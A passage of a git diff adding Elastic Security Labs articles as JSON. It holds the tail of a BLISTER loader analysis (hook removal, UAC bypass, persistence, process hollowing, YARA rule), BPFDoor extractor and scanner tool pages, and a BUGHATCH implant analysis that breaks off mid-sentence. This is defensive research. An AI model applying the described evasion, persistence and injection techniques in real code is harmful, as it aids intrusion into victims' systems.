redirection](https://docs.microsoft.com/en-us/windows/win32/winprog64/file-system-redirector):\n\n\n\nAnd then maps the 64 bit version:\n\n\n\nThen if available, the mapped libraries will be used with the **GetProcAddress** function, i.e:\n\n\n\n#### LdrLoading Windows Libraries and Removing Hooks\n\nAfter mapping 32 and 64 bit **NTDLL** versions BLISTER will **LdrLoad** several Windows libraries and remove potential hooks:\n\n\n\nFirst, it tries to convert the hash to the library name by comparing the hash against a fixed list of known hashes:\n\n\n\nIf the hash is found BLISTER uses the **LdrLoad** to load the library:\n\n\n\nThen BLISTER searches for the corresponding module in its own process:\n\n\n\nAnd maps a fresh copy of the library with the module’s **FullDllName** :\n\n\n\n\n\nBLISTER then applies the relocation to the mapped library with the loaded one as the base address for the relocation calculation:\n\n\n\nNext BLISTER iterates over each section of the loaded library to see if the section is executable:\n\n\n\nIf the section is executable, it is replaced with the mapped one, thus removing any hooks:\n\n\n\n#### x64 API Call\n\nBLISTER can call 64-bit library functions through the use of special 64-bit function wrapper:\n\n\n\n\n\nTo make this call BLISTER switches between 32-bit to 64-bit code using the old Heaven’s Gate [technique](https://blog.talosintelligence.com/2019/07/rats-and-stealers-rush-through-heavens.html):\n\n\n\n\n\n\n\n## Unpacking Payload\n\nDuring the unpacking process of the payload, the malware starts by allocating memory using **NtAllocateVirtualMemory** and passing in configuration information. A memcpy function is used to store a copy of encrypted/compressed payload in a buffer for next stage (decryption).\n\n\n\n### Deciphering\n\nBLISTER leverages the Rabbit stream [cipher](), passing in the previously allocated buffer containing the encrypted payload, the compressed data size along with the 16-byte deciphering key and 8-byte IV.\n\n\n\n\n\n### Decompression\n\nAfter the decryption stage, the payload is then decompressed using **RtlDecompressBuffer** with the LZNT1 compression format.\n\n\n\n## Persistence Mechanism\n\nTo achieve persistence, BLISTER leverages Windows shortcuts by creating an LNK file inside the Windows startup folder. It creates a new directory using the **CreateDirectoryW** function with a unique hardcoded string found in the configuration file such as: C:\\ProgramData`UNIQUE STRING\\\\>`\n\nBLISTER then copies C:\\System32\\rundll32.exe and itself to the newly created directory and renames the files to UNIQUE STRING\\\\>.exe and UNIQUE STRING\\\\>.dll, respectively.\n\nBLISTER uses the **CopyModuleIntoFolder** function and the **IFileOperation** Windows **COM** interface for [bypassing UAC](https://www.elastic.co/security-labs/exploring-windows-uac-bypasses-techniques-and-detection-strategies) when copying and renaming the files:\n\n\n\nThe malware creates an LNK file using **IShellLinkW COM** interface and stores it in `C:\\Users\\\\AppData\\Roaming\\Microsft\\Windows\\Start Menu\\Startup as UNIQUE STRING\\\\>.lnk`\n\n\n\nThe LNK file is set to run the export function **LaunchColorCpl** of the newly copied malware with the renamed instance of rundll32. C:\\ProgramData\\UNIQUE STRING\\\\>\\UNIQUE STRING\\\\>.exe C:\\ProgramData\\UNIQUE STRING\\\\>\\UNIQUE STRING\\\\>.dll,LaunchColorCpl\n\n## Injecting Payload\n\nBLISTER implements 3 different injection techniques to execute the payload according to the configuration flag:\n\n\n\n### Shellcode Execution\n\nAfter decrypting the shellcode, BLISTER is able to inject it to a newly allocated read write memory region with **NtAllocateVirtualMemory** API, it then copies the shellcode to it and it sets the memory region to read write execute with **NtProtectVirtualMemory** and then executes it.\n\n\n\n### Own Process Injection\n\nBLISTER can execute DLL or Executable payloads reflectively in its memory space. It first creates a section with **NtCreateSection** API.\n\n\n\nBLISTER then tries to map a view on the created section at the payload’s preferred base address. In case the preferred address is not available and the payload is an executable it will simply map a view on the created section at a random address and then do relocation.\n\n\n\nConversly, if the payload is a DLL, it will first unmap the memory region of the current process image and then it will map a view on the created section with the payload’s preferred address.\n\n\n\nBLISTER then calls a function to copy the PE headers and the sections.\n\n\n\nFinally, BLISTER executes the loaded payload in memory starting from its entry point if the payload is an executable. In case the payload is a DLL, it will find its export function according to the hash in the config file and execute it.\n\n### Process Hollowing\n\nBLISTER is able to perform [process hollowing](https://attack.mitre.org/techniques/T1055/012/) in a remote process:\n\nFirst, there is an initial check for a specific module hash value (0x12453653), if met, BLISTER performs process hollowing against the Internet Explorer executable.\n\n\n\nIf not, the malware performs remote process hollowing with **Werfault.exe**. BLISTER follows standard techniques used for process hollowing.\n\n\n\nThere is one path within this function: if certain criteria are met matching Windows OS versions and build numbers the hollowing technique is performed by dropping a temporary file on disk within the **AppData** folder titled **Bg.Agent.ETW** with an explicit extension.\n\n\n\n\n\n\n\nThe malware uses this file to read and write malicious DLL to this file. Werfault.exe is started by BLISTER and then the contents of this temporary DLL are loaded into memory into the Werfault process and the file is shortly deleted after.\n\n\n\n## Configuration Extractor\n\nAutomating the configuration and payload extraction from BLISTER is a key aspect when it comes to threat hunting as it gives visibility of the campaign and the malware deployed by the threat actors which enable us to discover new unknown samples and Cobalt Strike instances in a timely manner.\n\nOur extractor uses a [Rabbit stream cipher implementation](https://github.com/Robin-Pwner/Rabbit-Cipher) and takes either a directory of samples with **-d** option or **-f** for a single sample,\n\n\n\nTo enable the community to further defend themselves against existing and new variants of the BLISTER loader, we are making the configuration extractor open source under the Apache 2 License. The configuration extractor documentation and binary download can be accessed [here](https://www.elastic.co/security-labs/blister-configuration-extractor).\n\n## Conclusion\n\nBLISTER continues to be a formidable threat, punching above its own weight class, distributing popular malware families and implants leading to major compromises. Elastic Security has been tracking BLISTER for months and we see no signs of this family slowing down.\n\nFrom reversing BLISTER, our team was able to identify key functionality such as different injection methods, multiple techniques for defense evasion using anti-debug/anti-analysis features and heavy reliance on Windows Native API’s. We also are releasing a configuration extractor that can statically retrieve actionable information from BLISTER samples as well as dump out the embedded payloads.\n\n## Appendix\n\n### Configuration Structure\n\n```\nBLISTER configuration structure\n\nstruct Config {\n uint16_t flag;\n uint32_t payload_export_hash;\n wchar_t w_payload_filename_and_cmdline[783];\n size_t compressed_data_size;\n size_t uncompressed_data_size;\n uint8_t pe_deciphering_key[16];\n uint8_t pe_deciphering_iv[8];\n};\n\n```\n\n### Configuration’s Flags\n\n```\nBLISTER configuration files\n\nenum Config::Flags {\n kDoPersistance = 0x1,\n kOwnProcessReflectiveInjectionMethod = 0x2,\n kOwnProcessHollowingMethod = 0x8,\n kRemoteProcessHollowingMethod = 0x10,\n kExecutePayloadExport = 0x20,\n kExecuteShellcodeMethod = 0x40,\n kInjectWithCmdLine = 0x80,\n kSleepAfterInjection = 0x100,\n kEnableSleepBasedAntiDebug = 0x800,\n};\n```\n\n### Hashing Algorithm\n\n```\nBLISTER hashing algorithm\n\nuint32_t HashLibraryName(wchar_t *name) {\n uint32_t name {0};\n while (*name) {\n hash = ((hash >> 23) | (hash << 9)) + *name++;\n }\n return hash ;\n}\n```\n\n### Indicators\n\n| Indicator | Type | Note |\n| ---------------------------------------------------------------- | ------ | ----------- |\n| afb77617a4ca637614c429440c78da438e190dd1ca24dc78483aa731d80832c2 | SHA256 | BLISTER DLL |\n\n## YARA Rule\n\nThis updated YARA rule has shown a 13% improvement in detection rates.\n\n```\nBLISTER YARA rule\n\nrule Windows_Trojan_BLISTER {\n meta:\n Author = \"Elastic Security\"\n creation_date = \"2022-04-29\"\n last_modified = \"2022-04-29\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"BLISTER\"\n threat_name = \"Windows.Trojan.BLISTER\"\n description = \"Detects BLISTER loader.\"\n reference_sample = \"afb77617a4ca637614c429440c78da438e190dd1ca24dc78483aa731d80832c2\"\n\n strings:\n $a1 = { 8D 45 DC 89 5D EC 50 6A 04 8D 45 F0 50 8D 45 EC 50 6A FF FF D7 }\n $a2 = { 75 F7 39 4D FC 0F 85 F3 00 00 00 64 A1 30 00 00 00 53 57 89 75 }\n $a3 = { 78 03 C3 8B 48 20 8B 50 1C 03 CB 8B 78 24 03 D3 8B 40 18 03 FB 89 4D F8 89 55 E0 89 45 E4 85 C0 74 3E 8B 09 8B D6 03 CB 8A 01 84 C0 74 17 C1 C2 09 0F BE C0 03 D0 41 8A 01 84 C0 75 F1 81 FA B2 17 EB 41 74 27 8B 4D F8 83 C7 02 8B 45 F4 83 C1 04 40 89 4D F8 89 45 F4 0F B7 C0 3B 45 E4 72 C2 8B FE 8B 45 04 B9 }\n $b1 = { 65 48 8B 04 25 60 00 00 00 44 0F B7 DB 48 8B 48 ?? 48 8B 41 ?? C7 45 48 ?? ?? ?? ?? 4C 8B 40 ?? 49 63 40 ?? }\n $b2 = { B9 FF FF FF 7F 89 5D 40 8B C1 44 8D 63 ?? F0 44 01 65 40 49 2B C4 75 ?? 39 4D 40 0F 85 ?? ?? ?? ?? 65 48 8B 04 25 60 00 00 00 44 0F B7 DB }\n condition:\n any of them\n}\n```\n\n## References\n\n- [https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign](https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign)\n- [https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html](https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html?utm_source=trendmicroresearch&utm_medium=smk&utm_campaign=0422_Socgholish)\n- [https://redcanary.com/threat-detection-report/threats/socgholish/](https://redcanary.com/threat-detection-report/threats/socgholish/)\n\n## Artifacts\n\nArtifacts are also available for [download](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blte5a55b99e66b4794/628e88d91cd65960bcff2862/blister-indicators.zip) in both ECS and STIX format in a combined zip bundle.\n"
+ },
+ "title": "BLISTER Loader",
+ "slug": "blister-loader",
+ "date": "2023-04-13",
+ "description": "The BLISTER loader continues to be actively used to load a variety of malware.",
+ "author": [
+ {
+ "slug": "cyril-francois"
+ },
+ {
+ "slug": "daniel-stepanic"
+ },
+ {
+ "slug": "salim-bitam"
+ }
+ ],
+ "image": "blog-thumb-power-lines.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "blister",
+ "malware"
+ ]
+ },
+ "id": "security_labs_content-blister_loader-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-bpfdoor_configuration_extractor-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-bpfdoor_configuration_extractor-md.json
new file mode 100644
index 00000000000..377da1712a8
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-bpfdoor_configuration_extractor-md.json
@@ -0,0 +1,27 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"BPFDoor Configuration Extractor\"\nslug: \"bpfdoor-configuration-extractor\"\ndate: \"2022-12-06\"\ndescription: \"Configuration extractor to dump out hardcoded passwords with BPFDoor.\"\nauthor:\n - slug: elastic-security-labs\nimage: \"tools-image.jpg\"\ncategory:\n - slug: tools\ntags:\n - bpfdoor\n---\n\nConfiguration extractor to dump out hardcoded passwords with BPFDoor.\n\n[Download bpfdoor-config-extractor.tar.gz](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt3f57100ade3473c5/62882ccdb4fa6b61ed70ba87/bpfdoor-config-extractor.tar.gz)\n\n## Overview\n\nThis tool provides a Python module and command line tool that will extract passwords from BPFDoor samples.\n\n> The Elastic Security Team has released an indepth analysis of the BPFDoor malware and created an additional tool that will scan for BPFDoor infected hosts.\n>\n> - [BPFDoor analysis](https://bookish-bassoon-c37be003.pages.github.io/intelligence/2022/05/04.bpfdoor/article/)\n> - [BPFDoor scanner](https://www.elastic.co/security-labs/bpfdoor-scanner)\n\n## Getting Started\n\n### Docker\n\nWe can easily run the extractor with Docker, first we need to build the image.\n\n```\nBuilding the BPFDoor Docker image\n\ndocker build . -t bpfdoor-extractor\n```\n\nThen we run the container with the **-v** flag to map a host directory to the Docker container directory that contains the BPFDoor samples.\n\n```\nRunning the BPFDoor Docker container\n\ndocker run -ti --rm -v $(pwd)/binaries:/binaries \\\n bpfdoor-extractor:latest -d /binaries/\n```\n\nWe can either specify a single sample with **-f** option or a directory of samples with **-d**\n\n```\nBPFDoor Configuration Extractor help output\n\ndocker run -ti --rm bpfdoor-extractor:latest -h\n\nAuthor: Elastic Security (MARE)\n\n______ ______ ______ ______\n| ___ \\| ___ \\| ___|| _ \\\n| |_/ /| |_/ /| |_ | | | | ___ ___ _ __\n| ___ \\| __/ | _| | | | |/ _ \\ / _ \\ | '__|\n| |_/ /| | | | | |/ /| (_) || (_) || |\n\\____/ \\_| \\_| |___/ \\___/ \\___/ |_|\n _____ __ _ _____ _ _\n/ __ \\ / _|(_) | ___| | | | |\n| / \\/ ___ _ __ | |_ _ __ _ | |__ __ __| |_ _ __ __ _ ___ | |_ ___ _ __\n| | / _ \\ | '_ \\ | _|| | / _` | | __|\\ \\/ /| __|| '__|/ _` | / __|| __|/ _ \\ | '__|\n| \\__/\\| (_) || | | || | | || (_| | | |___ > < | |_ | | | (_| || (__ | |_| (_) || |\n \\____/ \\___/ |_| |_||_| |_| \\__, | \\____//_/\\_\\ \\__||_| \\__,_| \\___| \\__|\\___/ |_|\n __/ |\n |___/\n\n\nusage: bpfdoor-extractor [-h] (-f FILENAME | -d DIRNAME)\n\noptions:\n -h, --help show this help message and exit\n -f FILENAME, --file FILENAME\n File\n -d DIRNAME, --dir DIRNAME\n Directory\n\n```\n\n### Running it Locally\n\nAs mentioned above, Docker is the recommended approach to running this project, however you can also run this locally. This project uses [Poetry](https://python-poetry.org/) to manage dependencies, testing, and metadata. If you have Poetry installed already, from this directory, you can simply run the following commands to run the tool. This will setup a virtual environment, install the dependencies, activate the virtual environment, and run the console script.\n\n```\npoetry lock\npoetry install\npoetry shell\nbpfdoor-extractor --help\n```\n\nOnce that works, you can do the same sort of things as mentioned in the Docker instructions above.\n"
+ },
+ "title": "BPFDoor Configuration Extractor",
+ "slug": "bpfdoor-configuration-extractor",
+ "date": "2022-12-06",
+ "description": "Configuration extractor to dump out hardcoded passwords with BPFDoor.",
+ "author": [
+ {
+ "slug": "elastic-security-labs"
+ }
+ ],
+ "image": "tools-image.jpg",
+ "category": [
+ {
+ "slug": "tools"
+ }
+ ],
+ "tags": [
+ "bpfdoor"
+ ]
+ },
+ "id": "security_labs_content-bpfdoor_configuration_extractor-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-bpfdoor_scanner-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-bpfdoor_scanner-md.json
new file mode 100644
index 00000000000..28fe37c80b1
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-bpfdoor_scanner-md.json
@@ -0,0 +1,27 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"BPFDoor Scanner\"\nslug: \"bpfdoor-scanner\"\ndate: \"2022-12-06\"\ndescription: \"Python script to identify hosts infected with the BPFDoor malware.\"\nauthor:\n - slug: elastic-security-labs\nimage: \"tools-image.jpg\"\ncategory:\n - slug: tools\ntags:\n - bpfdoor\n---\n\nPython script to identify hosts infected with the BPFDoor malware.\n\n[Download bpfdoor-scanner.tar.gz](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltae9bafece9048014/62882b50dcc93261eccb04e2/bpfdoor-scanner.tar.gz)\n\n## Getting Started\n\nThis tool provides a Python script to identify hosts that are infected with the BPFDoor malware.\n\n> The Elastic Security Team has released an indepth analysis of the BPFDoor malware and created an additional tool that will extract configurations from BPFDoor malware samples.\n>\n> - [BPFDoor analysis](https://bookish-bassoon-c37be003.pages.github.io/intelligence/2022/05/04.bpfdoor/article/)\n> - [BPFDoor configuration extractor](https://www.elastic.co/security-labs/bpfdoor-configuration-extractor)\n\n### Permissions\n\nOn Linux (and thus in a container), the tool requires the following permissions:\n\n- CAP_NET_BIND_SERVICE\n- CAP_NET_RAW\n\nOn any \\*NIX host, running the script with sudo will get you what you need. As long as you don’t strip the privileges listed for your container and you publish the UDP port you intend to receive on, you should be set.\n\n### Docker\n\nWe can easily run the scanner with Docker, first we need to build the image:\n\n```\nBuilding the BPFDoor scanner Docker image\n\ndocker build . -t bpfdoor-scanner\n```\n\n## Usage\n\nOnce you’be built the Docker iamge, we can run the container to get a list of the options.\n\n```\nRuning the BPFDoor container\n\ndocker run -ti --rm bpfdoor-scanner:latest --help\n\nUsage: bpfdoor-scanner [OPTIONS]\n\n Sends a discovery packet to suspected BPFDoor endpoints.\n\n Example usage:\n\n sudo ./bpfdoor-scanner --target-ip 1.2.3.4\n\n Sends a packet to IP 1.2.3.4 using the default target port 68/UDP (tool\n listens on all ports) using the default interface on this host and listens\n on port 53/UDP to masquerade as traffic.\n\n NOTE: Elevated privileges are required for source ports < 1024.\n\nOptions:\n --target-ip TEXT [required]\n --target-port INTEGER [default: 68]\n --source-ip TEXT IP for target to respond to and attempt to bind\n locally [default: 172.17.0.3]\n --source-port INTEGER Local port to listen on for response [default: 53]\n --timeout INTEGER Number of seconds to wait for response [default: 5]\n -v, --verbose Show verbose output\n -d, --debug Show debug output\n --version\n --help Show this message and exit.\n```\n\nThe minimum required option is just --target-ip. The rest have defaults. For running in a container, you’ll want to publish the return port (defaults to 53) and specify --source-ip of the host interface you wish to use. In the following example, the IP 192.168.100.10 is the interface on my host that will receive the packet.\n\n```\nExample running the BPFDoor scanner\n\ndocker run -ti --publish 53:53/udp --rm bpfdoor-scanner:latest \\\n --target-ip 192.168.32.18 --source-ip 192.168.100.10\n```\n\n## Running Locally\n\nAs mentioned above, Docker is the recommended approach to running this project, however you can also run this locally. This project uses [Poetry](https://python-poetry.org/) to manage dependencies, testing, and metadata. If you have Poetry installed already, from this directory, you can simply run the following commands to run the tool. This will setup a virtual environment, install the dependencies, activate the virtual environment, and run the console script.\n\n```\nRunning BPFDoor scanner locally\n\npoetry lock\npoetry install\npoetry shell\nsudo bpfdoor-scanner --help\n```\n\nOnce that works, you can do the same sort of things as mentioned in the Docker instructions above.\n"
+ },
+ "title": "BPFDoor Scanner",
+ "slug": "bpfdoor-scanner",
+ "date": "2022-12-06",
+ "description": "Python script to identify hosts infected with the BPFDoor malware.",
+ "author": [
+ {
+ "slug": "elastic-security-labs"
+ }
+ ],
+ "image": "tools-image.jpg",
+ "category": [
+ {
+ "slug": "tools"
+ }
+ ],
+ "tags": [
+ "bpfdoor"
+ ]
+ },
+ "id": "security_labs_content-bpfdoor_scanner-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-bughatch_malware_analysis-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-bughatch_malware_analysis-md.json
new file mode 100644
index 00000000000..1ee381d5ff4
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-bughatch_malware_analysis-md.json
@@ -0,0 +1,30 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"BUGHATCH Malware Analysis\"\nslug: \"bughatch-malware-analysis\"\ndate: \"2022-09-09\"\nsubtitle: \"Malware analysis of the BUGHATCH downloader.\"\ndescription: \"Elastic Security has performed a deep technical analysis of the BUGHATCH malware. This includes capabilities as well as defensive countermeasures.\"\nauthor:\n - slug: salim-bitam\nimage: \"libraries-edev-ops-1680x980.jpg\"\ncategory:\n - slug: malware-analysis\ntags:\n - bughatch\n - cuba\n - ref9019\n---\n\n## Key takeaways\n\n- Elastic Security Labs is releasing a BUGHATCH malware analysis report from a recent [campaign](https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis)\n- This report covers detailed code analysis, network communication protocols, command handling, and observed TTPs\n- From this research we produced a [YARA rule](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Bughatch.yar) to detect the BUGHATCH downloader\n\n## Preamble\n\nBUGHATCH is an implant of a custom C2 deployed during the CUBA ransomware campaigns we observed in February of 2022, this tool was most likely built by the threat actor themselves as it was not used previously.\n\nBUGHATCH is capable of downloading and executing commands and arbitrary code, it gives the operator the freedom to execute payloads with different techniques like reflection, shellcode execution, system command execution, and so on. The samples we have seen were not obfuscated and were deployed using a custom obfuscated in-memory dropper written in PowerShell and referred to as [TERMITE by Mandiant](https://www.mandiant.com/resources/unc2596-cuba-ransomware).\n\nIn this document, we will go through the execution flow of BUGHATCH highlighting its functionalities and code execution techniques, a YARA rule and the MITRE ATT&CK mapping can be found in the appendix.\n\nIn this analysis we will describe the following:\n\n- Token adjustment\n- Information collection\n- Threading and thread synchronization\n- Network communication protocol\n- Command handling\n\n> For information on the CUBA ransomware campaign and associated malware analysis, check out our blog posts detailing this:\n>\n> - [CUBA Ransomware Campaign](https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis)\n> - [CUBA Malware Analysis](https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis)\n\n## Static analysis\n\n| | |\n| ------------ | ---------------------------------------------------------------- | --- |\n| SHA256 | F1325F8A55164E904A4B183186F44F815693A008A9445D2606215A232658C3CF |\n| File Size | 35840 bytes |\n| File Type: | Win32 executable |\n| Signed? | No |\n| Packer? | No |\n| Compiler | Visual Studio 2017 - 15.5.0 preview 2 |\n| Compile Time | Sun Feb 06 21:05:18 2022 | UTC |\n| Entropy | 6.109 |\n\n### Sections\n\n| | | | | | |\n| ------ | -------------- | ------------ | -------- | ------- | -------------------------------- |\n| Name | VirtualAddress | Virtual Size | Raw Size | Entropy | MD5 |\n| .text | 0x1000 | 0x6000 | 0x5400 | 5.933 | A6E30CCF838569781703C943F18DC3F5 |\n| .rdata | 0x7000 | 0x3000 | 0x2A00 | 6.217 | 9D9AD1251943ECACE81644A7AC320B3C |\n| .data | 0xA000 | 0x1000 | 0x400 | 1.163 | B983B8EB258220628BE2A88CA44286B4 |\n| .reloc | 0xB000 | 0x424 | 0x600 | 5.235 | 39324A58D79FC5B8910CBD9AFBF1A6CB |\n\n## Code analysis\n\nBUGHATCH is an in-memory implant loaded by an obfuscated PowerShell script that decodes and executes an embedded shellcode blob in its allocated memory space using common Windows APIs ( **VirtualAlloc** , **CreateThread, WaitForSingleObject** ).\n\nThe PowerShell loader uses inline C# to load APIs needed for shellcode injection as seen in the following pseudocode.\n\n\n\nThe PowerShell script is obfuscated with random functions and variable names and contains the shellcode in a reverse-Base64 format.\n\n\n\nThe script first decodes the reverse-Base64 encoded data, then allocates a memory region with **VirtualAlloc** before copying the shellcode into it. Finally, the script executes the shellcode by creating a new thread with the **CreateThread** API.\n\n\n\nThe shellcode downloads another shellcode blob and the encrypted PE implant from the C2 server, this second shellcode decrypts and reflectively loads the PE malware.\n\nThis section dives deeper into the BUGHATCH execution flow, threading and encryption implementation, communication protocol with C2, and finally supported commands and payload execution techniques implemented.\n\nThe following is a diagram summarizing the execution flow of the implant:\n\n\n\n\n\n### Token adjustment\n\nThe implant starts by elevating permissions using the **SeDebugPrivilege** method, enabling the malware to access and read the memory of other processes. It leverages common Windows APIs to achieve this as shown in the pseudocode below:\n\n\n\n### Information collection\n\nThe malware collects host-based information used to fingerprint the infected system, this information will be stored in a custom structure that will be 2-byte XOR encrypted and sent to the C2 server in an HTTP POST request.\n\nThe following lists the collected information:\n\n- Current value of the performance counter\n- Network information\n- System information\n- Token information\n- Domain and Username of the current process\n- Current process path\n\n#### Current value of the performance counter\n\nUsing the **QueryPerformanceCounter** API, it collects the amount of time since the system was last booted. This value will be used to compute the 2-byte XOR encryption key to encrypt communications between the implant and the C2 server, a detailed analysis of the encryption implementation will follow.\n\n\n\n#### Network information\n\nIt collects the addresses of network interfaces connected to the infected machine by using the **GetIpAddrTable** Windows API.\n\n\n\n#### System information\n\nBUGHATCH collects key system information which includes:\n\n- Windows major release, minor release, and build number\n- Processor architecture (either 32-bit or 64-bit)\n- Computer name\n\n\n\n#### Token information\n\nThe agent proceeds to collect the current process token group membership, it invokes the **AllocateAndInitializeSid** API followed by the **CheckTokenMembership** API, concatenating the [SDDL SID strings](https://docs.microsoft.com/en-us/windows/win32/secauthz/sid-strings) for every group the process token is part of. While not unique to BUGHATCH, this is detected by Elastic's [Enumeration of Privileged Local Groups Membership](https://www.elastic.co/guide/en/security/current/enumeration-of-privileged-local-groups-membership.html) detection rule.\n\n\n\n#### Domain and username of the current process\n\nThe malware opens a handle to the current process with **OpenProcessToken** and gets the structure that contains the user account of the token with **GetTokenInformation**. It then retrieves the username and domain of the user account with the **LookupAccountSidW** API and concatenates the 2 strings in the following format: **DOMAIN\\USERNAME**.\n\n\n\n#### Current process path\n\nFinally, it collects the current process path with **GetModuleFileNameW**. The malware then encrypts the entire populated structure with a simple 2-byte XOR algorithm, this encryption implementation is detailed later in the report.\n\n## Threading and thread synchronization\n\nThe implant is multithreaded; it uses two different linked lists, one is filled with the commands received from the C2 server and the other is filled with the output of the commands executed.\n\nIt spawns 5 worker threads, each handling a command received from the C2 server by accessing the appropriate linked list using the **CriticalSection** object. The main process’ thread also retrieves the command's output from the second linked list using the **CriticalSection** object for synchronization purposes, to avoid any race conditions.\n\n\n\n## Network communication protocol\n\nIn this section we will detail:\n\n- Base communication protocol\n- Encryption implementation\n\nThe implant we analyzed uses HTTP(S) for communications. On top of the SSL encryption of the protocol, the malware and C2 encrypt the data with a 2-byte XOR key computed by the malware for each new session. The values to compute the 2-byte XOR key are prepended at the beginning of the base protocol packet which the server extracts to decrypt/encrypt commands.\n\nWhen launched, the malware will first send an HTTP POST request to the C2 server containing all the collected information extracted from the victim’s machine, the C2 then responds with the operator’s command if available, or else the agent sleeps for 60 seconds. After executing the command and only if the output of the executed command is available, the malware will send a POST request containing both the collected information and the command’s output, otherwise, it sends the collected information and waits for new commands.\n\n\n\n### Base communication protocol\n\nThe author(s) of BUGHATCH implemented a custom network protocol, the following is the syntax that the agent and server use for their communication:\n\n\n\n- **XOR key values:** The values to compute the 2-byte XOR encryption key used to encrypt the rest of the data\n- **Separator:** A static value ( **0x389D3AB7** ) that separates **Msg** chunks, example: the server can send different instructions in the same HTTP request separated by the **Separator**\n- **Chunk length:** Is the length of the **Msg** , **Separator** and **Chunk length**\n- **Msg:** Is the message to be sent, the message differs from the agent to the server.\n\nWe will dive deeper into the encapsulation of the **Msg** for both the agent and the server.\n\n\n\n### Encryption implementation\n\nThe malware uses 2-byte XOR encryption when communicating with the C&C server; a 2-byte XOR key is generated and computed by the implant for every session with the C2 server.\n\nThe agent uses two DWORD values returned by **QueryPerformanceCounter** API as stated earlier, it then computes a 2-byte XOR key by XOR-encoding the DWORD values and then multiplying and adding hardcoded values. The following is a Python pseudocode of how the KEY is computed:\n\n```\ntmp = (PerformanceCount[0] ^ PerformanceCount[1]) & 0xFFFFFFFF\nXorKey = (0x343FD * tmp + 0x269EC3)& 0xFFFFFFFF\nXorKey = p16(XorKey >> 16).ljust(2, b'\\x00')\n```\n\n\n\n## Command handling\n\nIn this section, we will dive deeper into the functionalities implemented in the agent and their respective **Msg** structure that will be encapsulated in the base communication protocol structure as mentioned previously.\n\nOnce the working threads are started, the main thread will continue beaconing to the C2 server to retrieve commands. The main loop is made up of the following:\n\n- Send POST request\n- Decrypt the received command and add it to the linked list\n- Sleep for 60 seconds\n\nA working thread will first execute the **RemoveEntryRecvLinkedList** function that accesses and retrieves the data sent by the C2 server from the linked list.\n\n\n\nThe thread will then de-encapsulate the data received from the C2 and extract the **Msg(Command)**. The malware implements different functionalities according to a command flag, the table below illustrates the functionalities of each command:\n\n| | |\n| ------------ | --------------------------------------------------------------------- |\n| Command FLAG | Description |\n| 1 | Group functions related to code and command execution |\n| 2 | Group functions related to utilities like impersonation and migration |\n| 3 | Process injection of a PE file in a suspended child process |\n\n### Command 1\n\nThis command gives access to functionalities related to payload execution, from DLL to PE executable to PowerShell and cmd scripts.\n\nSome of the sub-commands use pipes to redirect the standard input/output of the child process, which enables the attacker to execute payloads and retrieve its output, for example, PowerShell or Mimikatz, etc…\n\nThe following is the list of sub commands:\n\n| | | |\n| ---------------- | --------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------- |\n| Sub Command Flag | Function Name | Functionality description |\n| 2 | ReflectivelyExecutePERemote | Reflectively loads PE files in a child process and redirects its standard input output, the output will be sent to the operator C2 server |\n| 3 | DropPEDiskExecute | Drops a PE file to disk and executes it, the execution output is then sent to the operator’s C2 server |\n| 4 | SelfShellcodeExecute | Executes a shellcode in the same process |\n| 5 | RemoteShellcodeExecute | Executes a shellcode in a suspended spawned child process |\n| 6 | ExecuteCmd | Executes a CMD script/command |\n| 7 | ExecutePowershell | Executes a Powershell script/command |\n| 9 | ReflectivelyLoadDllRemote | Executes a DLL reflectively in a remote process using CreateRemoteThread API |\n\nThe following is the structure that is used by the above commands:\n\n```\nstruct ExecutePayloadCommandStruct\n{\n DWORD commandFlag;\n DWORD field_0;\n DWORD subCommandFlag_1;\n DWORD readPipeTimeOut_2;\n DWORD payloadSize_3;\n DWORD commandLineArgumentSize_4;\n DWORD STDINDataSize_5;\n CHAR payload_cmdline_stdin[n];\n};\n```\n\n- **commandFlag:** Indicates the command\n- **subCommandFlag:** Indicates the subcommand\n- **readPipeTimeOut:** Indicates the timeout for reading the output of child processes from a pipe\n- **payloadSize:** Indicates the payload size\n- **commandLineArgumentSize:** Indicates length of the command line arguments when executing the payload, example a PE binary\n- **STDINDataSize:** Indicates the length of the standard input data that will be sent to the child process\n- **Payload_cmdline_stdin:** Can contain the payload PE file for example, its command line arguments and the standard input data that will be forwarded to the child process, the malware knows the beginning and end of each of these using their respective length.\n\n#### ReflectivelyExecutePERemote\n\nThe agent reflectively loads PE binaries in the memory space of a created process in a suspended state (either **cmd.exe** or **svchost.exe** ). The agent leverages [anonymous (unnamed) pipes](https://docs.microsoft.com/en-us/windows/win32/ipc/anonymous-pipes) within Windows to redirect the created child process's standard input and output handles. It first creates an anonymous pipe that will be used to retrieve the output of the created process, then the pipe handles are specified in the **STARTUPINFO** structure of the child process.\n\n\n\nAfter creating the suspended process, the 